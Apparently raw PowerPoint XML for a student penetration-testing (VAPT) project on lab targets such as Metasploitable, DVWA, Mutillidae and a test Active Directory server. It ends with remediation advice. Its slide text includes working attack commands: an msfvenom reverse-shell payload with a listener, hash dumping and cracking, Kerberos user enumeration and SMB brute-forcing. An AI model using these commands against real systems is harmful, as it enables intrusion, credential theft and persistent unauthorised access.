            <a:ext cx="7555001" cy="35221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US"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Part-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sz="28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Mutillidae</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"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Reconnaissance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Gathering information about the application to identify potential attack vectors.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Scanning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Using automated tools to identify security weaknesses in the application.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Exploitation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Attempting to exploit identified vulnerabilities to determine their impact.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Documenting findings, risk levels, and recommendations for improving security.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Remediation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Providing actionable steps to fix identified vulnerabilities and enhance security.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4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636EF60-4C67-A4A8-63E6-B02D23B3B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B62D32BE-406F-E3A1-3762-7D84DDE0C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460578"/>
            <a:ext cx="7848600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 Found in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Mutillidae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SQL Injection Vulnerability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Mutillidae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vulnerable to SQL injection, enabling attackers to alter SQL queries executed by the database.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Insufficient Input Validation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application fails to validate user inputs, increasing its risk to various attack vectors.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Weak Authentication Mechanism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authentication process can be bypassed through SQL injection attacks.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1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A430-B234-9843-C986-F4333BA0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3816429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  <a:b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Kali Linux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penetration testing distribution with various security tools.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Metasploitable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vulnerable Linux VM for security testing.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For navigating to the user info page.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US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SQLMap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Automates the detection and exploitation of SQL injection vulnerabilities.</a:t>
            </a:r>
            <a:b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Burp Suite</a:t>
            </a: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Used for testing and identifying security vulnerabilities in web applications.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9323C2-9692-78B9-E3D0-E2579ABC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3245227"/>
            <a:ext cx="8001000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A430-B234-9843-C986-F4333BA0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226866"/>
            <a:ext cx="7881645" cy="478328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400" dirty="0"/>
              <a:t>Evidence</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-IN" dirty="0"/>
            </a:br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9323C2-9692-78B9-E3D0-E2579ABC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3245227"/>
            <a:ext cx="8001000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62B63-AC0B-396E-C1B5-AAADC9C5E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66750"/>
            <a:ext cx="5743575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4B663-8482-3D6D-B871-199981309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00425"/>
            <a:ext cx="55816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43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A430-B234-9843-C986-F4333BA0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226866"/>
            <a:ext cx="7881645" cy="478328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400" dirty="0"/>
              <a:t>Evidence</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-IN" dirty="0"/>
            </a:br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9323C2-9692-78B9-E3D0-E2579ABC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3245227"/>
            <a:ext cx="8001000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B4759-3605-BF05-D1E3-D719A91A5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37" y="693420"/>
            <a:ext cx="4258564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F7DA9B-0C8B-C85F-AC22-767524988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238642"/>
            <a:ext cx="3552825" cy="1537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E5312-55D2-9D34-2CAD-B2123610BE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7"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4893527" y="693420"/>
            <a:ext cx="3897401" cy="205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5A0833-6534-BE77-4AA3-2DEDC37A0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26" y="2922270"/>
            <a:ext cx="3897401" cy="19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56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D1A430-B234-9843-C986-F4333BA0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226866"/>
            <a:ext cx="7881645" cy="178510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br>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-IN" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-IN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49323C2-9692-78B9-E3D0-E2579ABC5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3245227"/>
            <a:ext cx="8001000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4F6F71-5136-ACDC-7E28-9DCD1A2EF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767507"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="533399" y="971550"/>
          <a:ext cx="7805446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723">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1258719833"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3902723">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3778039166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Short-Term Recommendations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Long-Term Recommendations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241676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Input Validation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Ensure user inputs are sanitized to prevent SQL injection and XSS.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Conduct Regular Security Training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Train developers on secure coding and threat awareness.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983413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Parameterized Queries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Use secure database interactions to block SQL injection.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 Periodic Security Assessments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Regularly test for vulnerabilities and fix issues.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12221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Update Application Dependencies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Regularly update all libraries and frameworks.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Establish a Robust Incident Response Plan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Prepare a plan to handle security breaches efficiently.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10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Disable Unnecessary Services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Turn off unused features to reduce risks.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a Web Application Firewall (WAF): </a:t>
                      </a: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a WAF to block malicious traffic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249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941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BCD0-682B-95F3-D223-3207A140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2769989"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p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1839B-8BB5-255A-0FA7-274274C57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7482"/>
            <a:ext cx="7247890" cy="2369880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		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974452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DC382-0C42-B37F-2784-92089813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800219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Part 4: Penetration Testing on Active Directory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CE70FA-F38C-83B8-3468-50F5E5518D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6563" y="315387"/>
            <a:ext cx="855503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Reconnaissance and Enumeration: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information about the Active Directory environment, including domain names, network architecture, and active services on critical servers.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Vulnerability Assessment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Conduct vulnerability scans to identify weaknesses in the Active Directory.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Security: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password hashes and test password strength using a dictionary attack.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Access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Validation: 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alidate permissions and assess the extent of access to critical domain resources and accounts.</a:t>
            </a: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l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actionable short-term and long-term recommendations to address identified vulnerabilities and enhance security.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97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DC382-0C42-B37F-2784-92089813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1292662"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:b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Weaknesses in Active Directory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BEF744-780E-5669-D415-4BFA43C72E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5965" y="654018"/>
            <a:ext cx="825083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Version Disclosure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Tools like Nmap can uncover service versions running on the system, which might reveal   vulnerabilities linked to those specific versions.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Kerberos User Discovery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Enumeration techniques can expose valid usernames in Active Directory, risking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access when weak or default credentials are in use.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Vulnerable SMB Credentials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Conducting brute-force attacks on SMB services may expose weak passwords, allowing unauthorized access to sensitive files and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LDAP Security Flaws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Inadequate security measures or misconfigurations in LDAP can be exploited, potentially granting unauthorized access to sensitive directory data.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="350656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010" y="927100"/>
            <a:ext cx="3664077" cy="33210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51375" y="1533601"/>
            <a:ext cx="3886835" cy="16754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600" b="1" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Discover</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" b="1" spc="-40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Security </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" b="1" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Vulnerabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" b="1" spc="-55" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" b="1" spc="-25" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" b="1" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>IT </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" b="1" spc="-10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Services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DC382-0C42-B37F-2784-92089813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1200329"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:br>
              <a:rPr lang="en-IN" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tools Used</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1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BEF744-780E-5669-D415-4BFA43C72E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35965" y="592463"/>
            <a:ext cx="825083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and Version Detection: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to detect open ports and services on the Active Directory server.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Directory-Specific Scan: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Scans for LDAP to retrieve detailed information about the service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Metasploit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Kerberos Enumeration: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gather valid usernames and analyze Kerberos tickets for potential access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SMB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ute-Force Attack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Used to perform brute-force attacks on SMB to test for weak password vulnerabilities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Jxplorer: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Java-based LDAP browser that enables exploration of Active Directory entries after successful authentication,     allowing for easy navigation and identification of potential security misconfigurations.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75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6133-0F4D-8691-79C1-85864A10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30887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471B7-D824-0D44-8A0F-8C1FCEA7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65" y="853516"/>
            <a:ext cx="7247890" cy="1384995"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/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Scanning: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–p 389 192.168.137.58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nmap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–p 389 –A  –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vv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192.168.137.58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C1F5B-C23B-244D-9919-E428AD87A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56" y="2114550"/>
            <a:ext cx="4318546" cy="2258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CD669-4D52-117B-BCE8-9F7607A1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36" y="2114550"/>
            <a:ext cx="4012714" cy="22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550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6133-0F4D-8691-79C1-85864A10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0011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471B7-D824-0D44-8A0F-8C1FCEA7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65" y="853516"/>
            <a:ext cx="7247890" cy="2800767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Kerberos Enumeration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msfconsole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kerberos_enumusers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auxiliary/gather/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kerberos_enumusers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options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Domain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domain.local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RHOSTS 192.168.137.58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RPORT 88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USER_FILE username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7A647-F4D8-39E9-0301-271361A4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86504"/>
            <a:ext cx="5334000" cy="38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32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6133-0F4D-8691-79C1-85864A10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30887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471B7-D824-0D44-8A0F-8C1FCEA7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65" y="853516"/>
            <a:ext cx="7247890" cy="2400657"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/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Force Attack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smb_login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auxiliary/scanner/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smb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smb_login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options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PASS_FILE pass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RHOSTS 192.168.137.58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SMBUser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Adhvik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01349-50BB-2CC3-BA5A-FE58CF889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70051"/>
            <a:ext cx="5055596" cy="25567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A061A-6CC4-B7C4-5FF9-A626DC4EB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326823"/>
            <a:ext cx="5055596" cy="153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0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6133-0F4D-8691-79C1-85864A10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30887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Evidence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471B7-D824-0D44-8A0F-8C1FCEA7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65" y="853516"/>
            <a:ext cx="3374035" cy="1938992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Directory Hack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Demonstrates the ability to interact with Active Directory after successful exploitation, highlighting the outcome of the vulnerability assessment.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02">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D6D027C-6F50-E1E9-2BB9-C6CF97C466B7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0" y="666750"/>
            <a:ext cx="5105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92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6133-0F4D-8691-79C1-85864A10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430887"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/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471B7-D824-0D44-8A0F-8C1FCEA7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65" y="853516"/>
            <a:ext cx="8250835" cy="3242234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09DDC4-D709-510F-285B-21508E052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841437"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="435965" y="853516"/>
          <a:ext cx="8250834" cy="305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5417">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3604027026"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4125417">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2150358164"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="603872">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p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Short-Term Recommendations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Long-Term Recommendations</a:t>
                      </a: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867328"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="603872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strong password policies, including complex password requirements.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multi-factor authentication (MFA) for all sensitive accounts.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819599"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="603872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Enable account lockout policies to prevent brute-force attacks.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Regularly audit and test Active Directory configurations for security best practices.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172294"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="603872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Regularly monitor and review Kerberos ticket activity for anomalies.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Adopt a least privilege model by limiting permissions to only what is necessary.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692333"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="603872"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Patch known vulnerabilities in SMB and LDAP services.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Ensure continuous security awareness training for users on phishing and credential attacks.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-IN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191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173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1998979"/>
            <a:ext cx="60197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165" marR="5080" indent="-546100">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" dirty="0"/>
              <a:t>General Recommendations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873986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965" y="853516"/>
            <a:ext cx="8321675" cy="41068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Keep Software Updated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update your operating system and applications with the latest patches and security updates. This helps to fix known bugs and vulnerabilities quickly.</a:t>
            </a:r>
          </a:p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Use Strong Passwords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 that passwords are long, unique, and difficult to guess. Avoid using common words or personal information like names or birthdays.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Regular Backups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regular backups of important data and keep them stored in a secure location.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Use Firewalls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use firewalls to protect systems by filtering traffic and preventing unauthorized access.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5"/>
              </a:spcBef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General Recommendations</a:t>
            </a:r>
            <a:endParaRPr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965" y="853516"/>
            <a:ext cx="8321675" cy="432233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Limit User Access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users only the permissions they need to do their job. Avoid giving administrative privileges to everyone.</a:t>
            </a:r>
          </a:p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Encrypt Sensitive Data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 important files and data, especially when transferring over the internet or storing in databases.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/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Regular Security Audits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regular security audits and assessments to identify weaknesses in the system and fix them proactively.</a:t>
            </a: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Train Employees on Security Awareness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basic training on security practices like recognizing phishing emails and avoiding suspicious links or attachments.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just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>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc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5"/>
              </a:spcBef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General Recommendations</a:t>
            </a:r>
            <a:endParaRPr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07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746BA-2B1E-1021-CE81-2E6C66AAE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56" y="196088"/>
            <a:ext cx="7881645" cy="1723549"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:br>
              <a:rPr lang="en-IN" sz="2800" b="1" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-IN" sz="2800" b="1" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-IN" sz="2800" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" b="1" dirty="0"/>
              <a:t>		VAPT REPORT LINK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4BAD6-11A3-7D04-9B5E-F57943EED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965" y="853516"/>
            <a:ext cx="7247890" cy="1508105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		         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>Vapt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> report link </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:hlinkClick r:id="rId2" action="ppaction://hlinkfile"/>
              </a:rPr>
              <a:t>click here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55696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121150" cy="5143500"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="412115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121150" cy="5143500"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4121150" h="5143500">
                  <a:moveTo>
                    <a:pt x="4120769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120769" y="5143500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4120769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724" y="1238554"/>
              <a:ext cx="3349371" cy="266636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419474"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="110617" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="4056379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9176" y="752578"/>
            <a:ext cx="4150360" cy="2235226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869"/>
              </a:spcBef>
              <a:buSzPct val="117857"/>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="●"/>
              <a:tabLst>
                <a:tab pos="329565" algn="l"/>
              </a:tabLst>
            </a:pP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sz="1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r>
              <a:rPr sz="1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1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VAPT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Bank’s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marR="474345" indent="-317500">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buSzPct val="117857"/>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="●"/>
              <a:tabLst>
                <a:tab pos="329565" algn="l"/>
              </a:tabLst>
            </a:pP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sz="1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r>
              <a:rPr sz="14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1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VAPT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Metasploitable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VSFTP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DVWA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6865">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buSzPct val="117857"/>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="●"/>
              <a:tabLst>
                <a:tab pos="329565" algn="l"/>
              </a:tabLst>
            </a:pP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sz="1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r>
              <a:rPr sz="1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</a:t>
            </a:r>
            <a:r>
              <a:rPr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VAPT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Mutillidae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29565" indent="-316865">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1205"/>
              </a:spcBef>
              <a:buSzPct val="117857"/>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="●"/>
              <a:tabLst>
                <a:tab pos="329565" algn="l"/>
              </a:tabLst>
            </a:pP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sz="1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r>
              <a:rPr sz="14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IN" sz="14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rform</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN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VAPT on Active Directory Exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="329565" indent="-316865">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1205"/>
              </a:spcBef>
              <a:buSzPct val="117857"/>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="●"/>
              <a:tabLst>
                <a:tab pos="329565" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1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5:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN"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 Recommendations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5965" y="853516"/>
            <a:ext cx="8322945" cy="3173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TechNest</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1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LLC</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="14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sz="1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sz="14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provider</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="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Silicon</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="14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Valley,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="3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California.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1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TechNest</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1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LLC’s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clients,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1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sz="14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sz="1400" spc="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Bank,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1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DVWA,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1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Mutillidae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Active Directory</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1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sz="1400" spc="2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facing</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="2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cyberattacks</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="14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400" spc="2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sz="1400" spc="2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months.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1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lost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1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1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sz="1400" spc="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14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TechNest</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1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LLC</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="14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sz="14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sz="1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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1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1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attacks</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="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sz="1400" spc="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spc="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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="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loopholes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security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infrastructure.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Simultaneously,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want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other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</a:t>
            </a:r>
            <a:r>
              <a:rPr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losing</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1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sz="1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6350" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pP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4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asked</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1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VAPT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Bank,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1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DVWA,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="14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Mutillidae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Active Directory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sz="1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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1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sz="1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penetration</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1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sz="1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400" spc="4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sz="1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sz="14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1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sz="14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highlighting</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="14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1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1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vulnerabilities.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5"/>
              </a:spcBef>
            </a:pP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24141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5"/>
              </a:spcBef>
            </a:pPr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Information</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" spc="-10" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" spc="-10" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" spc="-10" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-IN" spc="-10" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-IN" spc="-10" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-IN" spc="-10" dirty="0"/>
            </a:br>
            <a:endParaRPr spc="-1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810F53-7646-B4E2-C22C-94C049E0C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171854"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="762000" y="971550"/>
          <a:ext cx="7467600" cy="304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3824369906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342250417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808781163"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="425062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System Name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Funtionality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82781"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="4250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192.168.137.10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Kali Machine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Penetration Testing System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7530077"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="5909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192.168.137.67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Windows 10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 err="1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Mutillidae</a:t>
                      </a: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 &amp; DVWA Vulnerable Web Applications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9116246"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="42506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192.168.137.20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Metasploitable VM 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Target Machine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6468725"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="5909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192.168.137.58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Windows SRV 19</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-IN" sz="11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Active Directory Server, LDAP Enumeration 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9342802"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="59093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192.168.137.150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 err="1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Wazuh</a:t>
                      </a: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Server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IN" sz="1200" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Times New Roman" panose="020206030504050203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Threat Detection, Monitoring, and IDS</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-IN" sz="11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74948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956" y="196088"/>
            <a:ext cx="7881645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Setup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971550"/>
            <a:ext cx="3624822" cy="2971800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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CD0D8FB0-9210-EB14-ACD0-0C3C7ABC3E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9580" y="971550"/>
            <a:ext cx="384277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0097" y="2272995"/>
            <a:ext cx="45580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sz="3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Bank's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C367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1426</TotalTime>
  <Words>2763</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>457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Arial MT</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Let’s Discuss</vt:lpstr>
      <vt:lpstr>What is VAPT</vt:lpstr>
      <vt:lpstr>How to Begin a Pentesting Project?</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Project Objectives</vt:lpstr>
      <vt:lpstr> Problem Scenario</vt:lpstr>
      <vt:lpstr>Network Information      </vt:lpstr>
      <vt:lpstr>Lab Setup</vt:lpstr>
      <vt:lpstr>Zero Bank's Network</vt:lpstr>
      <vt:lpstr> Part-1: Zero Bank  Exploitation Process:  1: Network Scanning:      Nmap used to discover live systems and services on the network.  2: Vulnerability Scanning:      Use Metasploit to perform a detailed vulnerability scan on the target system.      Identify any weaknesses, specifically the SMB vulnerability (MS17-010), which is exploitable using EternalBlue  3: Exploiting the Vulnerability:      Exploit the MS17-010 (EternalBlue) vulnerability using Metasploit to gain unauthorized access to the system      Use msfvenom to generate a malicious payload and send it to the target system to gain a reverse shell.  4: Session Persistence:      Configure Meterpreter to maintain access and ensure persistence even after the machine is rebooted. </vt:lpstr>
      <vt:lpstr> Vulnerabilities Identified for Zero Bank</vt:lpstr>
      <vt:lpstr>Tools used   1. Nmap: Nmap is a network scanning tool used to discover live systems, open ports, and services running on the network.  2. MSFvenom: MSFvenom is a tool used to generate custom malware payloads for exploitation. In this project, it created a payload to deliver a reverse shell for remote access to the target machine.  3. Python HTTP Server: Set up a simple HTTP server to serve the generated payload for download on the target machine.  4. Metasploit Framework: Employed to establish a listener for the reverse shell initiated by the payload, allowing for post-exploitation actions and access to the target system.  </vt:lpstr>
      <vt:lpstr>Evidence                      nmap –sV –p 445 192.168.137.67       msfvenom –p windows/meterpreter/reverse_tcp LHOST 192.168.137.10 LPORT 4448 –f exe &gt; malware.exe  The creation of a malicious payload that will be used for exploitation</vt:lpstr>
      <vt:lpstr>Evidence       msfconsole      use exploit/multi/handler      set payload windows/meterpreter/reverse_tcp      set LHOST 192.168.137.10      set Lport 4448      exploit</vt:lpstr>
      <vt:lpstr>Evidence        sysinfo      hashdump                 john –format=NT hashes.txt  </vt:lpstr>
      <vt:lpstr>Recommendations</vt:lpstr>
      <vt:lpstr>     VSFTP and DVWA</vt:lpstr>
      <vt:lpstr>Part-2: VSFTP and DVWA</vt:lpstr>
      <vt:lpstr> Vulnerability Identified for VSFTPD   Description: VSFTPD version 2.3.4 has a critical backdoor that enables attackers to gain unauthorized access and establish a root shell on the target system, compromising its security.   Impact: Successful exploitation can lead to complete control over the affected system, allowing attackers to execute commands, access sensitive data, and manipulate system settings.  Recommendation: Upgrade to a secure version of VSFTPD to eliminate the backdoor and enhance overall security.    </vt:lpstr>
      <vt:lpstr>  Tools Used</vt:lpstr>
      <vt:lpstr> Evidence  </vt:lpstr>
      <vt:lpstr>Evidence </vt:lpstr>
      <vt:lpstr> Vulnerability Identified for DVWA   </vt:lpstr>
      <vt:lpstr>Vulnerability Identified for DVWA     </vt:lpstr>
      <vt:lpstr>Tools Used</vt:lpstr>
      <vt:lpstr>Evidence</vt:lpstr>
      <vt:lpstr>Evidence</vt:lpstr>
      <vt:lpstr>Evidence</vt:lpstr>
      <vt:lpstr>Recommendations</vt:lpstr>
      <vt:lpstr>Mutillidae</vt:lpstr>
      <vt:lpstr>  Part-3: Mutillidae    Reconnaissance: Gathering information about the application to identify potential attack vectors.  Vulnerability Scanning: Using automated tools to identify security weaknesses in the application.  Exploitation: Attempting to exploit identified vulnerabilities to determine their impact.  Reporting: Documenting findings, risk levels, and recommendations for improving security.  Remediation: Providing actionable steps to fix identified vulnerabilities and enhance security. </vt:lpstr>
      <vt:lpstr>               Vulnerabilities Found in Mutillidae     SQL Injection Vulnerability: Mutillidae is vulnerable to SQL injection, enabling attackers to alter SQL queries executed by the database.   Insufficient Input Validation: The application fails to validate user inputs, increasing its risk to various attack vectors.   Weak Authentication Mechanism: The authentication process can be bypassed through SQL injection attacks. </vt:lpstr>
      <vt:lpstr> Tools used               Kali Linux: A penetration testing distribution with various security tools.             Metasploitable 2: A vulnerable Linux VM for security testing.             Web Browser: For navigating to the user info page.              SQLMap: Automates the detection and exploitation of SQL injection vulnerabilities.               Burp Suite: Used for testing and identifying security vulnerabilities in web applications.     </vt:lpstr>
      <vt:lpstr>Evidence  </vt:lpstr>
      <vt:lpstr>Evidence  </vt:lpstr>
      <vt:lpstr>Recommendations    </vt:lpstr>
      <vt:lpstr>       Active Directory</vt:lpstr>
      <vt:lpstr> Part 4: Penetration Testing on Active Directory</vt:lpstr>
      <vt:lpstr> Security Weaknesses in Active Directory </vt:lpstr>
      <vt:lpstr> Tools Used </vt:lpstr>
      <vt:lpstr>Evidence</vt:lpstr>
      <vt:lpstr>Evidence</vt:lpstr>
      <vt:lpstr>Evidence</vt:lpstr>
      <vt:lpstr>Evidence</vt:lpstr>
      <vt:lpstr>Recommendations</vt:lpstr>
      <vt:lpstr>General Recommendations</vt:lpstr>
      <vt:lpstr> Part 5: General Recommendations</vt:lpstr>
      <vt:lpstr> Part 5: General Recommendations</vt:lpstr>
      <vt:lpstr>     VAPT REPORT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Advantages of Working on a Project</dc:title>
